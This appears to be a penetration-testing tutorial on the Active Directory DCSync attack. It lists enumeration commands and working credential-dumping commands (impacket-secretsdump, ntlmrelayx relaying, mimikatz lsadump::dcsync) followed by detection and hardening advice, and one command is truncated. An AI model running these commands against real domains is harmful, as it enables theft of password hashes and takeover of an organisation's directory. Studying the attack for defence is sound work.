The DCSync attack is a technique used by malicious actors to retrieve password hashes from a target domain controller in an Active Directory (AD) environment. This attack is based on abusing the DRSUAPI protocol, which is a part of the Microsoft Windows Active Directory replication process. Below, I’ll explain how the DCSync attack works, step by step, its requirements, and how to protect against it:

The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.
If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text

The following high-level sequence of steps explains how a DCSync attack works, enabling attackers to take complete control of an organization’s AD infrastructure.

Compromise a standard or non-privileged user account with “Replicate Directory Changes” permission.
Discover a DC in the specified domain name.
Request the DC to replicate sensitive information such as password hashes using the Microsoft Directory Replication Service Remote (MS-DRSR) protocol.
Obtain NTLM hashes of potentially useful accounts such as KRBTGT and Administrators.
Create a Golden Ticket and run Pass the Ticket (PTT) attacks to move laterally.

A DCSync is not a simple copy & parse of the NTDS.dit file, it’s a DsGetNCChanges operation transported in an RPC request to the DRSUAPI (Directory Replication Service API) to replicate data (including credentials) from a domain controller.

Elements Involved:

Active Directory Domain Controller (DC): The target domain controller is a Windows server responsible for managing user accounts, authentication, and authorization in the AD environment.
DCSync Tool: Malicious actors use tools like “Mimikatz”, “PowerShell Empire” or “Impacket” to perform DCSync attacks. These tools have built-in functionality to request password hashes from the target DC.
Privileged Access: To execute a DCSync attack, an attacker typically needs high-level privileges within the AD environment, such as Domain Admin or equivalent permissions.

Requirements:

Privileged Access: The attacker needs to have high-level privileges in the AD environment to execute DCSync successfully.
The DCSync permission implies having these permissions over the domain itself: DS-Replication-Get-Changes, Replicating Directory Changes All or Replicating Directory Changes In Filtered Set.
- Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default.
Additionally, any security principal with one of the following rights delegated at the domain level can also successfully retrieve password hash data using the DCSync attack.
- GenericAll (Full Control)
- AllExtendedRights
DCSync-Capable Tool: The attacker must have access to a tool with DCSync functionality, such as Mimikatz.
Network Access: The attacker needs network access to the target domain controller.

Important Notes about DCSync:

The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
By default only Domain Admins, Enterprise Admins, Administrators, Read-only Domain Controllers and Domain Controllers groups have the required privileges.
If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text

Enumeration

Enumeration (PowerView)

1. Query for the domain info, copy it (DC=vk9-sec,DC=com)

Get-ForestGlobalCatalog

2. Check who has Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set.

Get-ObjectAcl “DC=vk9-sec,DC=com” -ResolveGUIDS | ? {($_.ObjectAceType -like ‘DS-Replication*’)}
Get-ObjectAcl “DC=vk9-sec,DC=com” -ResolveGUIDS | ? {($_.ObjectAceType -like ‘Replicating*’)}
Get-ObjectAcl -DistinguishedName “dc=dollarcorp,dc=moneycorp,dc=local” -ResolveGUIDs | ?{($_.ObjectType -match ‘replication-get’) -or ($_.ActiveDirectoryRights -match ‘GenericAll’) -or ($_.ActiveDirectoryRights -match ‘WriteDacl’)}

Note: knowing already the target user SID we can query

Get-ObjectAcl “DC=vk9-sec,DC=com” -ResolveGUIDS | ? {($_.ObjectAceType -like ‘DS-Replication*’) -and ($_.SecurityIdentifier -match <SID>)}

3. Knowing there is a user with these types of permissions you can query for the SecurityIdentifier to know which user it is

Get-ADUser -Identity S-1-5-21-3777574546-3462295754-3391741248-4192

Enumeration (AD module)

1. If any user has following permission, the user can perform DCSync attack:

DS-Replication-Get-Changes extended right (Rights-GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
DS-Replication-Get-Changes-All extended right (Rights-GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
DS-Replication-Get-Changes-In-Filtered-Set extended right (Rights-GUID 89e95b76-444d-4c62-991a-0facbeda640c)

2. Search for users with the permissions

Import-Module ActiveDirectory
(Get-Acl “ad:\dc=vk9-sec,dc=com”).Access | ? {($_.ObjectType -eq “1131f6aa-9c07-11d1-f79f-00c04fc2dcd2” -or $_.ObjectType -eq “1131f6ad-9c07-11d1-f79f-00c04fc2dcd2” -or $_.ObjectType -eq “89e95b76-444d-4c62-991a-0facbeda640c” ) } | select IdentityReference

3. Query a specific user

(Get-Acl “ad:\dc=vk9-sec,dc=com”).Access | ? {$_.IdentityReference -match ‘user1’ -and ($_.ObjectType -eq “1131f6aa-9c07-11d1-f79f-00c04fc2dcd2” -or $_.ObjectType -eq “1131f6ad-9c07-11d1-f79f-00c04fc2dcd2” -or $_.ObjectType -eq “89e95b76-444d-4c62-991a-0facbeda640c” ) }

Exploitation

Exploitation (Impacket / Remote)

1. Having the credentials of the user with DS-Replication-Get-Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set permissions we can extract the users

impacket-secretsdump <Domain>/<Username>:<Password>@<IP> -just-dc
impacket-secretsdump vk9-sec.com/user1:Admin.123@192.168.0.110 -just-dc

2. To write the output in a file use -outputfile

impacket-secretsdump vk9-sec.com/user1:Admin.123@192.168.0.110 -just-dc -outputfile <filename>

3. We can try pass the hash

impacket-secretsdump -outputfile ‘something’ -hashes ‘LMhash’:’NThash’ ‘DOMAIN’/’USER’@’DOMAINCONTROLLER’

4. We can also attempt Pass-the-Ticket

secretsdump -k -outputfile ‘something’ ‘DOMAIN’/’USER’@’DOMAINCONTROLLER’

5. This attack can also be operated with a relayed NTLM authentication, but only if the target domain controller is vulnerable to Zerologon since the DRSUAPI always requires signing.

# target vulnerable to Zerologon, dump DC’s secrets only

ntlmrelayx.py -t dcsync://’DOMAINCONTROLLER’

# target vulnerable to Zerologon, dump Domain’s secrets

ntlmrelayx.py -t dcsync://’DOMAINCONTROLLER’ -auth-smb ‘DOMAIN’/’LOW_PRIV_USER’:’PASSWO

Errors

1. When the credentials are wrong

2. When the Permissions are invalid

Exploitation (Mimikatz / Local)

1. Once the account is delegated the ability to replicate objects, the account can run Mimikatz DCSync:

# Extract a specific user, in this case the krbtgt

lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:Administrator

# Dump everything (printed in a short and readable format)

lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /all /csv

Note: On Windows, mimikatz can be used lsadump::dcsync to operate a DCSync and recover the krbtgt keys for a golden ticket attack for example. For this attack to work, the following mimikatz command should run in an elevated context (i.e. through runas with plaintext password, pass-the-hash or pass-the-ticket).

Detection

Auditing

One method is to monitor Windows event logs for Event ID 4662. Logs are an important part of security, but using them to monitor across the IT environment has significant challenges.

Security Event ID 4662 (Audit Policy for object must be enabled) – An operation was performed on an object
Security Event ID 5136 (Audit Policy for object must be enabled) – A directory service object was modified
Security Event ID 4670 (Audit Policy for object must be enabled) – Permissions on an object were changed

For detect DCSync attack from Windows Security Log Event ID 4662 we need to check following parameter value:

SubjectUserName – “The subject fields indicate the account on the local system which requested the logon.”
AccessMask – will be 0x100 which means Control Access. Access allowed only after extended rights checks supported by the object are performed.
Properties – This has two parts of information. First part is the type of access that was used. Typically has the same value as Accesses field, for example, here is %%7688 is first part and second part is a tree of GUID values of Active Directory classes or property sets, for which operation was performed. The second part will be our concern point, where we like to check any GUID was match with DS-Replication-Get-Changes extended right / DS-Replication-Get-Changes-All extended / DS-Replication-Get-Changes-In-Filtered-Set extended right.

Detecting DCSync usage

While there may be event activity that could be used to identify DCSync usage, the best detection method is through network monitoring.

1. Identify all Domain Controller IP addresses and add to “Replication Allow List”.

Get-ADDomainController -filter * | select IPv4Address
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | select IPAddress

2. Configure IDS to trigger if DsGetNCChange request originates an IP not on the “Replication Allow List” (list of DC IPs).

Protection Against DCSync Attacks:

Implement Least Privilege: Limit the number of accounts with high-level privileges like Domain Admins to reduce the potential impact of privilege escalation.
Regularly Rotate Passwords: Frequently change the passwords of privileged accounts to make it more difficult for attackers to maintain access.
Monitor for Anomalies: Implement robust monitoring and auditing of AD events. Look for suspicious activities such as unusual replication requests or privilege escalations.
Restrict Network Access: Limit network access to domain controllers to only trusted systems and administrators.
Endpoint Security: Employ endpoint security solutions to detect and prevent credential theft and malicious activity
Limit Tool Availability: Restrict the availability of tools with DCSync capabilities to trusted administrators and systems.
Limit the number of security principals with replication rights to only those that absolutely require those rights.
Regularly review and audit your AD environment to identify non-default security principals with these rights and remove any unnecessary permissions.